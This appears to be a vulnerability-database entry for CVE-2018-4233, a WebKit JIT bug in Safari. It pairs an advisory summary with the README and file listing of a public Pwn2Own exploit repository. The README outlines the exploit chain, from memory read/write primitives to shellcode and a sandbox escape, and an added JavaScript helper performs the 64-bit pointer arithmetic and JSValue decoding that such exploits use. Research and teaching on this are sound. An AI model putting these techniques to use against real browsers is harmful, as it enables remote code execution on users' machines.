Related vulnerability
Title: WebKit security vulnerability in multiple Apple products (CVE-2018-4233)
Description: Apple iOS and the other products listed here are made by Apple Inc. (US). Apple iOS is an operating system developed for mobile devices; Safari is a web browser and the default browser shipped with Mac OS X and iOS; iCloud for Windows is a Windows-based cloud service. WebKit is the web browser engine component used by these products. The WebKit component in multiple Apple products contains a security vulnerability. A remote attacker can exploit it through a crafted website to execute arbitrary code (memory corruption). The following products and versions are affected: Apple iOS before 11.4; Safari 11
Description
Exploit for CVE-2018-4233, a WebKit JIT optimization bug used during Pwn2Own 2018
Introduction
# CVE-2018-4233
Exploit for CVE-2018-4233, a bug in the JIT compiler of WebKit. Tested on Safari 11.0.3 on macOS 10.13.3.
For more details see https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf
The exploit gains arbitrary memory read/write by constructing the addrof and fakeobj primitives and subsequently faking a typed array as described in http://www.phrack.org/papers/attacking_javascript_engines.html. Afterwards it locates the JIT page and writes the stage1 shellcode there. That in turn writes a .dylib (contained in stage2.js) to disk and loads it into the renderer process to perform a sandbox escape. Stage 2 uses a separate vulnerability to break out of the Safari sandbox and will be published at a later point.
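The two helpers every step of the chain above relies on, once `addrof` and `fakeobj` exist, are 64-bit address arithmetic that does not lose bits in a JavaScript number, and conversion between a 64-bit bit pattern and the double that carries it (a pointer written into an unboxed double array has to be stored as exactly that double). The block below is an added example of both, written for this page; it is not the exploit's own `int64.js`, and the names `Int64`, `classifyJSValue` and `unboxDouble` are this example's. The NaN-boxing constants (doubles boxed by adding 2^49, int32 tagged with 0xffff in the top 16 bits, cell pointers with the top 16 bits clear) are the 64-bit JSValue encoding from JavaScriptCore's JSValue.h.

```javascript
// Added example (not the exploit's own int64.js): 64-bit address arithmetic
// and double <-> bit-pattern conversion for JavaScriptCore exploitation.

// One 8-byte buffer viewed as a double and as bytes, so a double's IEEE-754
// bit pattern can be read or written directly. Typed arrays use host byte
// order, which is little-endian on every platform Safari runs on.
const scratchF64 = new Float64Array(1);
const scratchU8 = new Uint8Array(scratchF64.buffer);

// A 64-bit value held as 8 little-endian bytes. Arithmetic is byte-wise so it
// never passes through a JS number, which only has 53 integer bits.
class Int64 {
  constructor(bytes) {
    if (bytes.length !== 8) throw new Error('Int64 needs exactly 8 bytes');
    this.bytes = Uint8Array.from(bytes);
  }

  // Parse "0x..." with up to 16 hex digits, most significant digit first.
  static fromHex(hex) {
    const digits = hex.replace(/^0x/i, '').padStart(16, '0');
    if (!/^[0-9a-f]{16}$/i.test(digits)) throw new Error('bad hex: ' + hex);
    const bytes = new Uint8Array(8);
    for (let i = 0; i < 8; i++) {
      // Byte 0 is least significant, i.e. the last two hex digits.
      bytes[i] = parseInt(digits.slice(14 - 2 * i, 16 - 2 * i), 16);
    }
    return new Int64(bytes);
  }

  // The 64 raw bits of a double, e.g. a value read out of an unboxed
  // (DoubleShape) array that actually holds a pointer.
  static fromDouble(d) {
    scratchF64[0] = d;
    return new Int64(scratchU8);
  }

  // The double whose bit pattern equals this value. Storing it into a
  // DoubleShape array writes these raw bits, which is how a fake object's
  // fields, pointers included, are laid out from JavaScript.
  asDouble() {
    scratchU8.set(this.bytes);
    return scratchF64[0];
  }

  add(other) {                       // wraps modulo 2^64
    const out = new Uint8Array(8);
    let carry = 0;
    for (let i = 0; i < 8; i++) {
      const sum = this.bytes[i] + other.bytes[i] + carry;
      out[i] = sum & 0xff;
      carry = sum >> 8;
    }
    return new Int64(out);
  }

  sub(other) {                       // wraps modulo 2^64
    const out = new Uint8Array(8);
    let borrow = 0;
    for (let i = 0; i < 8; i++) {
      const diff = this.bytes[i] - other.bytes[i] - borrow;
      borrow = diff < 0 ? 1 : 0;
      out[i] = diff & 0xff;          // -1 & 0xff === 255, so this also wraps
    }
    return new Int64(out);
  }

  toString() {
    let s = '0x';
    for (let i = 7; i >= 0; i--) s += this.bytes[i].toString(16).padStart(2, '0');
    return s;
  }
}

// 64-bit JSValue NaN-boxing (JavaScriptCore JSValue.h): a double is boxed by
// adding 2^49 to its bits, an int32 carries 0xffff in the top 16 bits, and a
// value with the top 16 bits clear is a cell pointer (or a small immediate
// such as null/true/false).
const DOUBLE_ENCODE_OFFSET = Int64.fromHex('0x0002000000000000');

function classifyJSValue(v) {
  const top16 = (v.bytes[7] << 8) | v.bytes[6];
  if (top16 === 0) return 'cell';
  if (top16 === 0xffff) return 'int32';
  return 'double';
}

// Unbox a boxed double read out of a regular JSValue slot.
function unboxDouble(v) {
  return v.sub(DOUBLE_ENCODE_OFFSET).asDouble();
}
```

With these, a leaked value read as a double is turned into an address with `Int64.fromDouble`, offsets from `offsets.js`-style tables are applied with `add`, and the result is written back into an unboxed array with `asDouble`; `classifyJSValue` is the check to run on anything read from an object slot before treating it as a pointer.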
File snapshot
[4.0K] /data/pocs/665198e03eb73868074451e78858bd2a78457125
├── [ 177] index.html
├── [4.9K] int64.js
├── [ 418] logging.js
├── [ 796] offsets.js
├── [ 582] pwn.html
├── [9.7K] pwn.js
├── [ 770] README.md
├── [ 372] ready.js
├── [ 227] shell.js
├── [4.0K] stage1
│ ├── [ 754] make.py
│ └── [1.9K] stage1.asm
├── [1.1K] stage1.js
├── [4.0K] stage2
│ ├── [ 181] Makefile
│ ├── [ 326] make.py
│ ├── [ 137] stage2.c
│ └── [ 83] tester.c
├── [ 17K] stage2.js
└── [2.1K] utils.js
2 directories, 18 files